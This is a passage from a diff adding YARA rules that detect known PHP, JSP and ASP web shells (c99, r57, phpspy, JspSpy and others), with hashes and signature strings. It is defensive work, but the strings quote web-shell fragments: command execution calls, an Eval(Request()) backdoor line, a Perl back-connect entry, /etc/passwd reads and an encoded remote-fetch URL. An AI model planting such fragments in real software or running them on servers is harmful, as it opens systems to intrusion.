+		super_rule = 1
+		hash0 = "36331f2c81bad763528d0ae00edf55be"
+		hash1 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash2 = "8979594423b68489024447474d113894"
+		hash3 = "ec482fc969d182e5440521c913bab9bd"
+		hash4 = "f98d2b33cd777e160d1489afed96de39"
+		hash5 = "4b4c12b3002fad88ca6346a873855209"
+		hash6 = "e9a5280f77537e23da2545306f6a19ad"
+		hash7 = "598eef7544935cf2139d1eada4375bb5"
+	strings:
+		$s0 = "sbFolder.append(\"<tr><td >&nbsp;</td><td>\");" fullword
+		$s1 = "return filesize / intDivisor + \".\" + strAfterComma + \" \" + strUnit;" fullword
+		$s5 = "FileInfo fi = (FileInfo) ht.get(\"cqqUploadFile\");" fullword
+		$s6 = "<input type=\"hidden\" name=\"cmd\" value=\"<%=strCmd%>\">" fullword
+	condition:
+		2 of them
+}
+rule webshell_2_520_job_JspWebshell_1_2_ma1_ma4_2 {
+	meta:
+		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "56c005690da2558690c4aa305a31ad37"
+		hash3 = "70a0ee2624e5bbe5525ccadc467519f6"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
+	strings:
+		$s1 = "while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {" fullword
+		$s6 = "password = (String)session.getAttribute(\"password\");" fullword
+		$s7 = "insReader = new InputStreamReader(proc.getInputStream(), Charset.forName(\"GB231"
+	condition:
+		2 of them
+}
+rule webshell_shell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz {
+	meta:
+		description = "Web Shell - from files shell.php, 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 60
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
+		hash3 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash4 = "40a1f840111996ff7200d18968e42cfe"
+		hash5 = "e0202adff532b28ef1ba206cf95962f2"
+		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
+	strings:
+		$s0 = "$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";" fullword
+		$s5 = "while(list($kname, $columns) = @each($index)) {" fullword
+		$s6 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\";" fullword
+		$s9 = "$tabledump .= \"   PRIMARY KEY ($colnames)\";" fullword
+		$fn = "filename: backup"
+	condition:
+		2 of ($s*) and not $fn
+}
+rule webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx {
+	meta:
+		description = "Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "a2516ac6ee41a7cf931cbaef1134a9e4"
+		hash1 = "ef43fef943e9df90ddb6257950b3538f"
+		hash2 = "ae025c886fbe7f9ed159f49593674832"
+		hash3 = "911195a9b7c010f61b66439d9048f400"
+		hash4 = "697dae78c040150daff7db751fc0c03c"
+		hash5 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash6 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash7 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash8 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash9 = "41af6fd253648885c7ad2ed524e0692d"
+		hash10 = "6fcc283470465eed4870bcc3e2d7f14d"
+	strings:
+		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
+		$s11 = "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC"
+	condition:
+		all of them
+}
+rule webshell_itsec_PHPJackal_itsecteam_shell_jHn {
+	meta:
+		description = "Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
+		hash1 = "e2830d3286001d1455479849aacbbb38"
+		hash2 = "bd6d3b2763c705a01cc2b3f105a25fa4"
+		hash3 = "40c6ecf77253e805ace85f119fe1cebb"
+	strings:
+		$s0 = "$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");" fullword
+		$s6 = "while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|"
+		$s9 = "while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+"
+	condition:
+		2 of them
+}
+rule webshell_Shell_ci_Biz_was_here_c100_v_xxx {
+	meta:
+		description = "Web Shell - from files Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c99-shadows-mod.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "f2fa878de03732fbf5c86d656467ff50"
+		hash1 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
+	strings:
+		$s2 = "if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"Error: \".$stri"
+		$s3 = "<OPTION VALUE=\"find /etc/ -type f -perm -o+w 2> /dev/null\""
+		$s4 = "<OPTION VALUE=\"cat /proc/version /proc/cpuinfo\">CPUINFO" fullword
+		$s7 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/de"
+		$s9 = "<OPTION VALUE=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">USER"
+	condition:
+		2 of them
+}
+rule webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_xxx1 {
+	meta:
+		description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
+		hash1 = "f3ca29b7999643507081caab926e2e74"
+		hash2 = "527cf81f9272919bf872007e21c4bdda"
+	strings:
+		$s1 = "<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type="
+		$s2 = "$uploadfile = $_POST['path'].$_FILES['file']['name'];" fullword
+		$s6 = "elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}" fullword
+		$s7 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" fullword
+	condition:
+		2 of them
+}
+rule webshell_c99_c99shell_c99_w4cking_Shell_xxx {
+	meta:
+		description = "Web Shell - from files c99.php, c99shell.php, c99_w4cking.php, Shell [ci] .Biz was here.php, acid.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99.php, c99shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
+		hash2 = "9c34adbc8fd8d908cbb341734830f971"
+		hash3 = "f2fa878de03732fbf5c86d656467ff50"
+		hash4 = "b8f261a3cdf23398d573aaf55eaf63b5"
+		hash5 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash6 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash7 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash8 = "157b4ac3c7ba3a36e546e81e9279eab5"
+		hash9 = "048ccc01b873b40d57ce25a4c56ea717"
+	strings:
+		$s0 = "echo \"<b>HEXDUMP:</b><nobr>"
+		$s4 = "if ($filestealth) {$stat = stat($d.$f);}" fullword
+		$s5 = "while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo \"<tr><td>\".$r"
+		$s6 = "if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"DB "
+		$s8 = "echo \"<center><b>Server-status variables:</b><br><br>\";" fullword
+		$s9 = "echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>"
+	condition:
+		2 of them
+}
+rule webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz {
+	meta:
+		description = "Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash1 = "aa17b71bb93c6789911bd1c9df834ff9"
+		hash2 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash3 = "40a1f840111996ff7200d18968e42cfe"
+		hash4 = "e0202adff532b28ef1ba206cf95962f2"
+		hash5 = "802f5cae46d394b297482fd0c27cb2fc"
+	strings:
+		$s0 = "$this -> addFile($content, $filename);" fullword
+		$s3 = "function addFile($data, $name, $time = 0) {" fullword
+		$s8 = "function unix2DosTime($unixtime = 0) {" fullword
+		$s9 = "foreach($filelist as $filename){" fullword
+	condition:
+		all of them
+}
+rule webshell_c99_c66_c99_shadows_mod_c99shell {
+	meta:
+		description = "Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
+	strings:
+		$s2 = "  if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv"
+		$s3 = "  \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword
+		$s4 = "<br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#66"
+		$s7 = "   elseif (!$data = c99getsource($bind[\"src\"])) {echo \"Can't download sources"
+		$s8 = "  \"c99sh_datapipe.pl\"=>array(\"Using PERL\",\"perl %path %localport %remotehos"
+		$s9 = "   elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!"
+	condition:
+		2 of them
+}
+rule webshell_he1p_JspSpy_nogfw_ok_style_1_JspSpy1 {
+	meta:
+		description = "Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash1 = "d71716df5042880ef84427acee8b121e"
+		hash2 = "344f9073576a066142b2023629539ebd"
+		hash3 = "32dea47d9c13f9000c4c807561341bee"
+		hash4 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash5 = "3ea688e3439a1f56b16694667938316d"
+		hash6 = "2434a7a07cb47ce25b41d30bc291cacc"
+	strings:
+		$s0 = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>\"+" fullword
+		$s4 = "out.println(\"<h2>File Manager - Current disk &quot;\"+(cr.indexOf(\"/\") == 0?"
+		$s7 = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" fullword
+		$s8 = "\"<td nowrap>\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>"
+	condition:
+		2 of them
+}
+rule webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash4 = "e0354099bee243702eb11df8d0e046df"
+		hash5 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash6 = "655722eaa6c646437c8ae93daac46ae0"
+		hash7 = "591ca89a25f06cf01e4345f98a22845c"
+	strings:
+		$s0 = "return new Double(format.format(value)).doubleValue();" fullword
+		$s5 = "File tempF = new File(savePath);" fullword
+		$s9 = "if (tempF.isDirectory()) {" fullword
+	condition:
+		2 of them
+}
+rule webshell_c99_c99shell_c99_c99shell {
+	meta:
+		description = "Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
+		hash2 = "157b4ac3c7ba3a36e546e81e9279eab5"
+		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
+	strings:
+		$s2 = "$bindport_pass = \"c99\";" fullword
+		$s5 = " else {echo \"<b>Execution PHP-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr"
+	condition:
+		1 of them
+}
+rule webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat {
+	meta:
+		description = "Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ae025c886fbe7f9ed159f49593674832"
+		hash1 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash2 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash3 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash4 = "3f71175985848ee46cc13282fbed2269"
+	strings:
+		$s6 = "$res   = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d"
+		$s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword
+		$s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword
+		$s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword
+	condition:
+		2 of them
+}
+rule webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx {
+	meta:
+		description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, nstview.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, Cyber Shell (v 1.0).php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
+		hash1 = "4745d510fed4378e4b1730f56f25e569"
+		hash2 = "f3ca29b7999643507081caab926e2e74"
+		hash3 = "46a18979750fa458a04343cf58faa9bd"
+	strings:
+		$s3 = "BODY, TD, TR {" fullword
+		$s5 = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword
+		$s6 = "if ($file==\".\" || $file==\"..\") continue;" fullword
+	condition:
+		2 of them
+}
+rule webshell_000_403_807_a_c5_config_css_dm_he1p_xxx {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash9 = "d71716df5042880ef84427acee8b121e"
+		hash10 = "341298482cf90febebb8616426080d1d"
+		hash11 = "29aebe333d6332f0ebc2258def94d57e"
+		hash12 = "42654af68e5d4ea217e6ece5389eb302"
+		hash13 = "88fc87e7c58249a398efd5ceae636073"
+		hash14 = "4a812678308475c64132a9b56254edbc"
+		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash16 = "e0354099bee243702eb11df8d0e046df"
+		hash17 = "344f9073576a066142b2023629539ebd"
+		hash18 = "32dea47d9c13f9000c4c807561341bee"
+		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash20 = "655722eaa6c646437c8ae93daac46ae0"
+		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash22 = "6acc82544be056580c3a1caaa4999956"
+		hash23 = "6aa32a6392840e161a018f3907a86968"
+		hash24 = "591ca89a25f06cf01e4345f98a22845c"
+		hash25 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash26 = "3ea688e3439a1f56b16694667938316d"
+		hash27 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash28 = "71097537a91fac6b01f46f66ee2d7749"
+		hash29 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash30 = "7a4b090619ecce6f7bd838fe5c58554b"
+	strings:
+		$s3 = "String savePath = request.getParameter(\"savepath\");" fullword
+		$s4 = "URL downUrl = new URL(downFileUrl);" fullword
+		$s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword
+		$s6 = "String downFileUrl = request.getParameter(\"url\");" fullword
+		$s7 = "FileInputStream fInput = new FileInputStream(f);" fullword
+		$s8 = "URLConnection conn = downUrl.openConnection();" fullword
+		$s9 = "sis = request.getInputStream();" fullword
+	condition:
+		4 of them
+}
+rule webshell_2_520_icesword_job_ma1 {
+	meta:
+		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
+		hash3 = "56c005690da2558690c4aa305a31ad37"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+	strings:
+		$s1 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"></head>" fullword
+		$s3 = "<input type=\"hidden\" name=\"_EVENTTARGET\" value=\"\" />" fullword
+		$s8 = "<input type=\"hidden\" name=\"_EVENTARGUMENT\" value=\"\" />" fullword
+	condition:
+		2 of them
+}
+rule webshell_404_data_in_JFolder_jfolder01_jsp_suiyue_warn {
+	meta:
+		description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash3 = "8979594423b68489024447474d113894"
+		hash4 = "ec482fc969d182e5440521c913bab9bd"
+		hash5 = "f98d2b33cd777e160d1489afed96de39"
+		hash6 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+		hash7 = "e9a5280f77537e23da2545306f6a19ad"
+	strings:
+		$s0 = "<table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol"
+		$s2 = " KB </td>" fullword
+		$s3 = "<table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\""
+		$s4 = "<!-- <tr align=\"center\"> " fullword
+	condition:
+		all of them
+}
+
+rule webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY {
+	meta:
+		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash2 = "40a1f840111996ff7200d18968e42cfe"
+		hash3 = "0712e3dc262b4e1f98ed25760b206836"
+	strings:
+		$s4 = "http://www.4ngel.net" fullword
+		$s5 = "</a> | <a href=\"?action=phpenv\">PHP" fullword
+		$s8 = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword
+		$s9 = "Codz by Angel" fullword
+	condition:
+		2 of them
+}
+rule webshell_c99_locus7s_c99_w4cking_xxx {
+	meta:
+		description = "Web Shell - from files c99_locus7s.php, c99_w4cking.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, acid.php, newsh.php, r57.php, Backdoor.PHP.Agent.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "38fd7e45f9c11a37463c3ded1c76af4c"
+		hash1 = "9c34adbc8fd8d908cbb341734830f971"
+		hash2 = "ef43fef943e9df90ddb6257950b3538f"
+		hash3 = "ae025c886fbe7f9ed159f49593674832"
+		hash4 = "911195a9b7c010f61b66439d9048f400"
+		hash5 = "697dae78c040150daff7db751fc0c03c"
+		hash6 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash7 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash8 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash9 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash10 = "b8f261a3cdf23398d573aaf55eaf63b5"
+		hash11 = "0d2c2c151ed839e6bafc7aa9c69be715"
+		hash12 = "41af6fd253648885c7ad2ed524e0692d"
+		hash13 = "6fcc283470465eed4870bcc3e2d7f14d"
+	strings:
+		$s1 = "$res = @shell_exec($cfe);" fullword
+		$s8 = "$res = @ob_get_contents();" fullword
+		$s9 = "@exec($cfe,$res);" fullword
+	condition:
+		2 of them
+}
+rule webshell_browser_201_3_ma_ma2_download {
+	meta:
+		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash4 = "4b45715fa3fa5473640e17f49ef5513d"
+		hash5 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+	strings:
+		$s1 = "private static final int EDITFIELD_ROWS = 30;" fullword
+		$s2 = "private static String tempdir = \".\";" fullword
+		$s6 = "<input type=\"hidden\" name=\"dir\" value=\"<%=request.getAttribute(\"dir\")%>\""
+	condition:
+		2 of them
+}
+rule webshell_000_403_c5_queryDong_spyjsp2010 {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash4 = "655722eaa6c646437c8ae93daac46ae0"
+	strings:
+		$s2 = "\" <select name='encode' class='input'><option value=''>ANSI</option><option val"
+		$s7 = "JSession.setAttribute(\"MSG\",\"<span style='color:red'>Upload File Failed!</spa"
+		$s8 = "File f = new File(JSession.getAttribute(CURRENT_DIR)+\"/\"+fileBean.getFileName("
+		$s9 = "((Invoker)ins.get(\"vd\")).invoke(request,response,JSession);" fullword
+	condition:
+		2 of them
+}
+rule webshell_r57shell127_r57_kartal_r57 {
+	meta:
+		description = "Web Shell - from files r57shell127.php, r57_kartal.php, r57.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ae025c886fbe7f9ed159f49593674832"
+		hash1 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash2 = "4108f28a9792b50d95f95b9e5314fa1e"
+	strings:
+		$s2 = "$handle = @opendir($dir) or die(\"Can't open directory $dir\");" fullword
+		$s3 = "if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }" fullword
+		$s5 = "if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_"
+	condition:
+		2 of them
+}
+
+rule webshell_webshells_new_con2 {
+	meta:
+		description = "Web shells - generated from file con2.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "d3584159ab299d546bd77c9654932ae3"
+	strings:
+		$s7 = ",htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e"
+		$s10 = "j \"<Form action='\"&URL&\"?Action2=Post' method='post' name='EditForm'><input n"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_make2 {
+	meta:
+		description = "Web shells - generated from file make2.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		hash = "9af195491101e0816a263c106e4c145e"
+		score = 50
+	strings:
+		$s1 = "error_reporting(0);session_start();header(\"Content-type:text/html;charset=utf-8"
+	condition:
+		all of them
+}
+rule webshell_webshells_new_aaa {
+	meta:
+		description = "Web shells - generated from file aaa.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "68483788ab171a155db5266310c852b2"
+	strings:
+		$s0 = "Function fvm(jwv):If jwv=\"\"Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt=\""
+		$s5 = "<option value=\"\"DROP TABLE [jnc];exec mast\"&kvp&\"er..xp_regwrite 'HKEY_LOCAL"
+		$s17 = "if qpv=\"\" then qpv=\"x:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\"&br&"
+	condition:
+		1 of them
+}
+rule webshell_Expdoor_com_ASP {
+	meta:
+		description = "Web shells - generated from file Expdoor.com ASP.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "caef01bb8906d909f24d1fa109ea18a7"
+	strings:
+		$s4 = "\">www.Expdoor.com</a>" fullword
+		$s5 = "    <input name=\"FileName\" type=\"text\" value=\"Asp_ver.Asp\" size=\"20\" max"
+		$s10 = "set file=fs.OpenTextFile(server.MapPath(FileName),8,True)  '" fullword
+		$s14 = "set fs=server.CreateObject(\"Scripting.FileSystemObject\")   '" fullword
+		$s16 = "<TITLE>Expdoor.com ASP" fullword
+	condition:
+		2 of them
+}
+rule webshell_webshells_new_php2 {
+	meta:
+		description = "Web shells - generated from file php2.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "fbf2e76e6f897f6f42b896c855069276"
+	strings:
+		$s0 = "<?php $s=@$_GET[2];if(md5($s.$s)=="
+	condition:
+		all of them
+}
+rule webshell_bypass_iisuser_p {
+	meta:
+		description = "Web shells - generated from file bypass-iisuser-p.asp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "924d294400a64fa888a79316fb3ccd90"
+	strings:
+		$s0 = "<%Eval(Request(chr(112))):Set fso=CreateObject"
+	condition:
+		all of them
+}
+rule webshell_sig_404super {
+	meta:
+		description = "Web shells - generated from file 404super.php"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "7ed63176226f83d36dce47ce82507b28"
+	strings:
+		$s4 = "$i = pack('c*', 0x70, 0x61, 99, 107);" fullword
+		$s6 = "    'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631')," fullword
+		$s7 = "//http://require.duapp.com/session.php" fullword
+		$s8 = "if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}" fullword
+		$s12 = "//define('pass','123456');" fullword
+		$s13 = "$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO"
+	condition:
+		1 of them
+}
+rule webshell_webshells_new_JSP {
+	meta:
+		description = "Web shells - generated from file JSP.jsp"
+		author = "Florian Roth"
+		date = "2014/03/28"
+		score = 70
+		hash = "495f1a0a4c82f986f4bdf51ae1898ee7"
+	strings:
